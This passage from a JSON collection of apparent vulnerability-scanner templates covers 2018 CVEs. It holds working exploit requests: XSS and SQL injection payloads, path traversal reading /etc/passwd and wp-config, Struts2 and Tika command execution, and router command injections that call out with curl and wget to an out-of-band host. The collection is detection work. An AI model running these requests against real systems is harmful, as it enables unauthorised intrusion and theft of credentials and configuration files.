/cs/Satellite?destpage=\"<h1xxx\"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1\nHost: {{BaseURL}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(24)</script>","Missing translation key"],"condition":"and"}]}]},{"id":"CVE-2018-11227","info":{"name":"Monstra CMS <=3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?id=pages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin=\"><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11759","info":{"name":"Apache Tomcat JK Connect <=1.2.44 - Manager Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jkstatus","{{BaseURL}}/jkstatus;"],"matchers-condition":"and","matchers":[{"type":"word","words":["JK Status Manager"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12054","info":{"name":"Schools Alert Management Script - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img.php?f=/./etc/./passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14931","info":{"name":"Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-17254","info":{"name":"Joomla! JCK Editor SQL Injection","severity":"critical"},"requests":[{"raw":["GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-0127","info":{"name":"Cisco RV132W/RV134W Router - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dumpmdm.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Dump","MDM","cisco","admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19914","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/dns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E\n","GET /assets/dns.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-10822","info":{"name":"D-Link Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/uir//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-0296","info":{"name":"Cisco ASA - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"],"headers":{"Accept-Encoding":"deflate"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["///sessions"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14916","info":{"name":"Loytec LGATE-902 <6.4.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7467","info":{"name":"AxxonSoft Axxon Next - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-15745","info":{"name":"Argus Surveillance DVR 4.0.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support","[drivers]"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16979","info":{"name":"Monstra CMS 3.0.4 - HTTP Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["new line detected in","cryptographp.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8715","info":{"name":"AppWeb - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Digest username=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a class=\"logo\" href=\"https://embedthis.com/\">&nbsp;</a>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11409","info":{"name":"Splunk <=7.0.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json","{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json"],"matchers-condition":"and","matchers":[{"type":"word","words":["licenseKeys"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7719","info":{"name":"Acrolinx Server <5.2.5 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-18809","info":{"name":"TIBCO JasperReports Library - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["metadata.jdbc.driverClassName","metadata.hibernate.dialect"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1271","info":{"name":"Spring MVC Framework - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini","{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17246","info":{"name":"Kibana - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"An internal server error occurred\""]},{"type":"word","part":"header","words":["kbn-name","kibana"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2018-11473","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /users/registration HTTP/1.1\nHost: {{Hostname}}\n","POST /users/registration HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test&register=Register\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-1000861","info":{"name":"Jenkins - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["package#vulntest"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20985","info":{"name":"WordPress Payeezy Pay <=2.97 - Local File Inclusion","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"],"body":"x_login=../../../wp-config","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The base configuration for WordPress","define( 'DB_NAME',","define( 'DB_PASSWORD',"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12296","info":{"name":"Seagate NAS OS 4.3.15.1 - Server Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/external/7.0/system.System.get_infos HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["\"version\":","\"serial_number\":"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["\"version\": \"([0-9.]+)\""],"part":"body"}]}]},{"id":"CVE-2018-10230","info":{"name":"Zend Server <9.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","is not allowed to open debug sessions"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14474","info":{"name":"Orange Forum 1.4.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=http://interact.sh/?app.scan/","{{BaseURL}}/signup?next=http://interact.sh/?app.scan/"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-1335","info":{"name":"Apache Tika <1.1.8-  Header Command Injection","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/meta"],"body":"var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");","headers":{"X-Tika-OCRTesseractPath":"cscript","X-Tika-OCRLanguage":"//E:Jscript","Expect":"100-continue","Content-type":"image/jp2","Connection":"close"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: text/csv"]},{"type":"word","part":"body","words":["org.apache.tika.parser.DefaultParser","org.apache.tika.parser.gdal.GDALParse"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3810","info":{"name":"Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/options-general.php?page=smartcode"],"body":"sgcgoogleanalytic=<script>console.log(\"document.domain\")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<script>console.log(\"document.domain\")</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11776","info":{"name":"Apache Struts2 S2-057 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10823","info":{"name":"D-Link Routers - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16059","info":{"name":"WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/fcgi-bin/wgsetcgi"],"body":"action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand","matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15517","info":{"name":"D-Link Central WifiManager - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-20526","info":{"name":"Roxy Fileman 1.4.5 - Unrestricted File Upload","severity":"critical"},"requests":[{"raw":["POST /php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary20kgW2hEKYaeF5iP\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"action\"\n\nupload\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"method\"\n\najax\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"d\"\n\n/Uploads\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php7\"\nContent-Type: application/octet-stream\n\n<?php\necho md5('CVE-2018-20526');\n?>\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP--\n","GET /Uploads/{{randstr}}.php7 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["f76d6a5f7491700cc3a678bdba2902d3"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19439","info":{"name":"Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"],"matchers":[{"type":"word","part":"body","words":["<script>alert(1337)</script><!--</TITLE>"]}]}]},{"id":"CVE-2018-19326","info":{"name":"Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-14013","info":{"name":"Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18264","info":{"name":"Kubernetes Dashboard <1.10.1 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs","{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"apiVersion\") && contains(body, \"objectRef\")"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16159","info":{"name":"WordPress Gift Voucher <4.1.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=wpgv_doajax_front_template&template_id=1 and sleep(6)#\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"images\") && contains(body, \"title\")"],"condition":"and"}]}]},{"id":"CVE-2018-19458","info":{"name":"PHP Proxy 3.0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16283","info":{"name":"WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-19752","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/registrar.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test\n","GET /assets/registrars.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7251","info":{"name":"Anchor CMS 0.12.3 - Error Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/anchor/errors.log"],"matchers":[{"type":"word","words":["\"date\":","\"message\":","\"trace\":["],"condition":"and"}]}]},{"id":"CVE-2018-11784","info":{"name":"Apache Tomcat - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","negative":true,"status":[404]}]}]},{"id":"CVE-2018-16133","info":{"name":"Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET \\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-19915","info":{"name":"DomainMOD <=4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/host.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test\n","GET /assets/hosting.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-3760","info":{"name":"Ruby On Rails - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /assets/file:%2f%2f/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"path","regex":["/etc/passwd is no longer under a load path: (.*?),"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-10562","info":{"name":"Dasan GPON Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0\n","POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-6530","info":{"name":"D-Link - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nSOAPAction: \"whatever-serviceType#whatever-action\"\nContent-Type: text/xml\n\nwhatever-content\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2018-7422","info":{"name":"WordPress Site Editor <=1.1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php","{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-16761","info":{"name":"Eventum <3.4.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/select_project.php?url=http://interact.sh","{{BaseURL}}/clock_status.php?current_page=http://interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-10201","info":{"name":"Ncomputing vSPace Pro 10 and 11 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini","{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini","{{BaseURL}}/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-12613","info":{"name":"PhpMyAdmin <4.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5230","info":{"name":"Atlassian Jira Confluence - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iframe src=\"javascript:alert(document.domain)\">","confluence"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18778","info":{"name":"ACME mini_httpd <1.30 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /etc/passwd HTTP/1.1\nHost:\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12634","info":{"name":"CirCarLife Scada <4.3 - System Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/log"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","words":["user.debug","user.info","EVSE"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11709","info":{"name":"WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000226","info":{"name":"Cobbler - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>_CobblerXMLRPCInterface__make_token</methodName>\n  <params>\n    <param>\n      <value>\n        <string>cobbler</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), '<name>faultCode</name>')"]},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"word","part":"body","words":["<methodResponse>"]},{"type":"regex","part":"body","regex":["(.*[a-zA-Z0-9].+==)</string></value>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19892","info":{"name":"DomainMOD 4.11.01 